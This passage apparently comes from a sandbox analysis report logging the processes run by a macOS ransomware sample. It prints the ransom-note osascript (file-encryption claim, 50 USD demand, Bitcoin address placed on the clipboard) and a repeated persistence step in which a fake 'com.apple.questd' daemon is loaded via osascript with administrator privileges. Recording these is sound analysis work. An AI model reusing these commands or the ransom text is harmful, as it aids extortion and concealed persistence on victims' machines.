                                                                                                    Arguments:osascript -e beep 18say 'Your files are encrypted' waiting until completion falseset alTitle to 'Many of your important documents, photos, videos, images and other files are no longer accessible because they have been encrypted.Maybe you are busy looking for a way to recover your files, but do not waste your time. Nobody can recover your files without our decryption service.We guarantee however that you can recover your files safely and easily and this will cost you 50 USD without any additional fees.Our offer is valid FOR 3 DAYS (starting now!). Full details can be found in the file: READ_ME_NOW.txt located on your Desktop'set alText to 'Your files are encrypted'display alert alText message alTitle as critical buttons {'OK'}set the clipboard to '13roGMpWd7Pb3ZoJyce8eoQpfegQvGHHK7'
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:32
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/efw_cache_update
                                                                                                    Arguments:n/a
                                                                                                    File size:43040 bytes
                                                                                                    MD5 hash:b023ae2552a76bccb76119b06af40a10

                                                                                                    General

                                                                                                    Start time:14:18:52
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/xpcproxy
                                                                                                    Arguments:n/a
                                                                                                    File size:44048 bytes
                                                                                                    MD5 hash:4782e7ebd2985d32bc84f1f71c8f8fb7

                                                                                                    General

                                                                                                    Start time:14:18:52
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/Applications/Books.app/Contents/PlugIns/iBooksCacheDelete.appex/Contents/MacOS/iBooksCacheDelete
                                                                                                    Arguments:/Applications/Books.app/Contents/PlugIns/iBooksCacheDelete.appex/Contents/MacOS/iBooksCacheDelete
                                                                                                    File size:29088 bytes
                                                                                                    MD5 hash:d712c1710db543f2f6000412ed3314b0

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/xpcproxy
                                                                                                    Arguments:n/a
                                                                                                    File size:44048 bytes
                                                                                                    MD5 hash:4782e7ebd2985d32bc84f1f71c8f8fb7

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/sudo
                                                                                                    Arguments:sudo /Library/AppQuest/com.apple.questd --silent
                                                                                                    File size:370720 bytes
                                                                                                    MD5 hash:3ad133b223883539638210c984bb92d0

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/sudo
                                                                                                    Arguments:n/a
                                                                                                    File size:370720 bytes
                                                                                                    MD5 hash:3ad133b223883539638210c984bb92d0

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/Library/AppQuest/com.apple.questd
                                                                                                    Arguments:/Library/AppQuest/com.apple.questd --silent
                                                                                                    File size:87920 bytes
                                                                                                    MD5 hash:322f4fb8f257a2e651b128c41df92b1d

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:n/a
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/security_authtrampoline
                                                                                                    Arguments:/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 10 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:19120 bytes
                                                                                                    MD5 hash:f55206da7dd9b6699ecb7e3e8ce994f7

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl start questd
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:n/a
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/security_authtrampoline
                                                                                                    Arguments:/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 14 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:19120 bytes
                                                                                                    MD5 hash:f55206da7dd9b6699ecb7e3e8ce994f7

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:36
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl start questd
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:n/a
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/security_authtrampoline
                                                                                                    Arguments:/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:19120 bytes
                                                                                                    MD5 hash:f55206da7dd9b6699ecb7e3e8ce994f7

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl start questd
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:n/a
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/security_authtrampoline
                                                                                                    Arguments:/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:19120 bytes
                                                                                                    MD5 hash:f55206da7dd9b6699ecb7e3e8ce994f7

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:37
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl start questd
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:41
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:41
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:42
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:n/a
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:42
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/security_authtrampoline
                                                                                                    Arguments:/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:19120 bytes
                                                                                                    MD5 hash:f55206da7dd9b6699ecb7e3e8ce994f7

                                                                                                    General

                                                                                                    Start time:14:19:42
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:42
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:42
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:42
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:42
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:42
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:42
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl start questd
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:n/a
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/security_authtrampoline
                                                                                                    Arguments:/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:19120 bytes
                                                                                                    MD5 hash:f55206da7dd9b6699ecb7e3e8ce994f7

                                                                                                    General

                                                                                                    Start time:14:19:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl start questd
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:20:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:20:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:20:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:n/a
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:20:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/security_authtrampoline
                                                                                                    Arguments:/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:19120 bytes
                                                                                                    MD5 hash:f55206da7dd9b6699ecb7e3e8ce994f7

                                                                                                    General

                                                                                                    Start time:14:20:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:20:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:20:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:20:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:20:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:20:34
